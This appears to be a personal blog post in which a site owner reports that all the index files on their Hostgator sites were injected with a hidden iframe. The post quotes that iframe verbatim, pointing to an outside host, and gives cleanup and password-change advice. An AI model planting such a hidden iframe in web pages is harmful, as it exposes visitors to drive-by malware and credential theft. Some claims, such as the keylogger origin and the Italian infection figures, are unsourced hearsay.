All my sites on Hostgator got attacked by iframe hack

iframe hack wordpress index filesAt 7 pm tonight my students emailed me that our blog was down.

I checked immediately for an attack, and found that all the index.php and index.html files were altered an 18:46 EST, and a line of code was added either after the starting body tag or at the very end of the code

<iframe src="http://a6t.homeftp.net:8080/ts/in.cgi?open" width=230 height=0 style="visibility: hidden"></iframe>

do not go there...

I googled the topic and found that some Russian hackers have created keylogger sites and the keylogger scripts get all your passwords.

If it is an individual site: your password was compromised.

I have sites on other servers, like this site, and none of those were attacked. I think it is Hostgator that is compromised... so if you have a site on hostgator, please check your index files... and clean them.

I hear in Italy tens of thousands of computers are infected... as a result of the iframe hack that effects every site, but especially wordpress blogs.

http://forums.digitalpoint.com/showthread.php?t=901622

This time the database isn't attacked, only the files. It seems that they get to the sites with ftp... if you can, please change your ftp and cpanel login. I am planning on removing my sites from hostgator.com